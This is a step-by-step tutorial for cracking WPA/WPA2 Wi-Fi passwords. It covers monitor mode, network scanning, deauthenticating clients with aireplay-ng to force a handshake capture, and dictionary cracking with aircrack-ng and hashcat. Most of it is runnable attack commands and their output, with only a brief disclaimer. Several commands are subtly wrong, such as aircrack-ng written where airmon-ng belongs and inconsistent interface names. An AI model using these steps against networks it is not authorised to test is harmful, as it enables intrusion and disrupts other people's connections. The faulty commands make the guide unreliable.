Date: 11/6/2021
1. INTRODUCTION
aircrack-ng is a widely used tool to analyze wireless connection. This tool offers many possibilities as it has other variants for different more focused analyses. To understand better this process, it is recommend that you do some background reading to better understand what WPA/WPA2 is.
Due to the extreme security that these protocols have, the only way to break the password is by capturing network packets with shared keys. Only plain brute force techniques can be used against WPA/WPA2, unlike WEP, which can be cracked by statistical methods used to make everything faster.
WPA/WPA2 makes the key not static, so the handshake between client and AP is needed. "Handshake" is done when the client connects to the network. Shared key can be from 8 to 63 characters in length, so it become possible to be effectively cracked.
The cracking process for the captured password is extremely slow, besides needing a lot of processing. It is only effective if the dictionary is relatively short in length.
To have an unbreakable wireless connection at home, adding special characters can make the cracking process ineffective.
This article will be useful for you to learn some methods of network secure cracking. Do not use for malicious purpose, you own your acts!
2. INTERFACE IN MONITOR MODE
!from now on, everything should be done with root privileges!
The network card needs to be in monitor mode to identify all the wireless networks around you. In this mode the network card can listen to every packet in the air. By hearing every packet, we can capture the WPA/WPA2 4-way handshake.
The process of enabling monitor mode will vary depending on what driver is used for the network card.
To determine the driver, the command airmon-ng will list them.
ifconfig command can be used to list interfaces. It is good to have more than one, so I would choose the second one, usually a adapted network card wlan1.
Now the following command is used to start the monitor mode.
$ aircrack-ng start wlan1
PHY Interface Driver Chipset
phy0 wlan0 ath0k Qualcomm Atheros AR0000 Wireless Network Adapter (PCI-Express) (rev 01)
phy2 wlan1 ath0k_htc Qualcomm Atheros Communications AR0000 802.11n
(mac0000 monitor mode vif enabled for [phy2]wlan1 on [phy2]wlan1mon)
(mac0000 station mode vif disabled for [phy2]wlan1)
notice that if ifconfig is executed again, the interface has changed to wlan1mon.
Now the WiFi interface has changed to wlan1mon, ifconfig proves this.
The following command can be used to start the monitor mode listening in one chosen channel:
$ aircrack-ng start wlan1 10
In this case channel 10, but I prefer to let the channel rotating, without specifying one.
3. DISCOVERING NETWORKS
The next step is to start the interface with the functionality that captures all connections happening around, so it is possible to discover deeper information about the target in addition to what we have as the ESSID.
airodump-ng is used.
$ airodump-ng wlan1mon
CH 11 ] [ Elapsed: 24 s ] [ 2021-03-11 14:31
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:E0:20:00:00:00 -40 33 9 0 11 130 WPA2 CCMP PSK WIFI-1
70:B6:06:00:00:00 -79 28 0 0 10 65 OPN
FC:2E:48:00:00:00 -84 17 8 0 10 540 WPA2 CCMP PSK WIFI-2
D8:A6:78:00:00:00 -85 19 0 0 1 130 WPA2 CCMP PSK WIFI-3
C0:C9:E3:00:00:00 -85 13 0 0 11 130 WPA2 CCMP PSK WIFI-4
5C:9D:7D:00:00:00 -90 5 2 0 6 195 WPA2 CCMP PSK WIFI-5
F8:AD:A6:00:00:00 -90 3 0 0 1 195 WPA2 CCMP PSK WIFI-6
E4:33:D7:00:00:00 -50 36 3 0 11 130 WPA2 CCMP PSK WIFI-7
EF:AD:A6:00:00:00 -92 5 0 0 1 195 OPN WIFI-8
BSSID STATION PWR Rate Lost Frames Notes Probes
F4:33:D7:00:00:00 02:F0:20:00:00:00 -43 0 - 1e 0 1
74:33:D7:00:00:00 10:54:BB:00:00:00 -75 0 -24e 0 4
Every BSSID has been changed!
I wont cover what each of those information means,
however it is extremely important to know.
4. CAPTURING HANDSHAKE
The purpose of the next step is to capture the 4-way handshake AP we are interested in.
To capture the initial connection between a device and the network we have to deauthenticate, a denial of service can be done.
The command will be similar to the previous one but we will apply some filters
to deal only with the AP we want.
$ airodump-ng -c 10 --bssid 00:00:00:00:00:00 -w handshake wlan0mon
- -c 10 -> channel used by the wireless network.
- --bssid 00:00:00:00:00:00 -> Access point MAC address. Eliminating other polluting networks.
- -w handshake -> The file that will contain the handshake (IVs).
The command line interface will look like this:
CH 10 ] [ Elapsed: 4 s ] [ 2007-03-24 17:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FC:2E:48:00:00:00 39 100 51 0 0 10 54 WPA2 CCMP PSK WIFI-2
BSSID STATION PWR Lost Packets Probes
Probably the packet we want will not be captured right away.
This may take a while as we are waiting for any device to connect to the network,
but if it does, it will be shown in the upper corner next to the date and time.
CH 10 ] [ Elapsed: 4 s ] [ 2007-03-24 16:58 ] [ WPA handshake: FC:2E:48:00:00:00
The next step is optional, because we can wait for the connection if we are patient enough. Maybe if there is any device associated with the AP, then you have to wait for one to connect to the AP so the handshake can be captured.
This step's purpose is to send a message to the device client associated with the AP saying that it is no longer associated with that AP. The client will reauthenticate generating a new 4-way handshake which is possible to be captured.
For this to work, the attacking computer needs to be close enough to the device client. The packages are sent directly, if the device is not able to hear, the attack wont work.
While the previous command is running, it is needed to open a new terminal to execute:
$ aireplay-ng -0 1 -a FC:2E:48:00:00:00 -c 06:C0:20:00:00:00 wlan1mon
This command will deauthenticate just one specified device. To deauthenticate all devices the command is:
$ aireplay-ng -0 1 -a FC:2E:48:00:00:00 wlan1mon
- -0 means deauthentication.
- 1 is the number of deauths to send (it is possible to send multiple).
- -a FC:2E:48:00:00:00 is the MAC address of the access point.
- -c 06:C0:20:00:00:00 is the MAC address of the client you are deauthing.
- wlan1mon is the interface name
If it works as planned, the client will reconnect and it will be possible to capture the handshake.
5. CRACKING THE KEY
The password cracking function being it WPA/WPA2 can be done using aircrack-ng. A dictionary of words is needed, so aircrack-ng will test all passwords.
aircrack-ng has it's own wordlist, John the Ripper can be used to generate the a new one and pipe into aircrack-ng.
To start cracking, open another terminal window and type:
$ aircrack-ng -b FC:2E:48:00:00:00 -w /path/to/the/wordlist.txt handshake.cap
- -w -> Password list.
- *.cap ->file containing the captured packets.
A output when the key is found:
Aircrack-ng 0.8
[00:00:00 ] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC CC C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 94 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D AD FC ED A6 DE 70 34 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 EE 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
6. CRACKING WITH HASHCAT
The hashcat accepts WPA/WPA2 hashes in ".hccapx" format.
The 4-way handshake has to be converted, ".cap" file to ".hccapx" file.
hcxtoolscan be used to convert.
$ ./cap2hccapx handshake.cap capture.hccapx
"capture.hccapx" is the output file.
And start to crack:
$ hashcat -m 2500 capture.hccapx /path/to/the/wordlist.txt
7. CONCLUSION
In conclusion, this whole process can serve to show you ways to break the password of your home or business network. it Is important to be aware to stay safe. Aircrack contains a classic set of tools. Conscientious use is very important and has the ability to help make security more productive and efficient.
8. REFERENCES
aircrack-ng.org/doku.php?id=cracking_wpahashcat.net/wiki/doku.php?id=cracking_wpawpa2
The End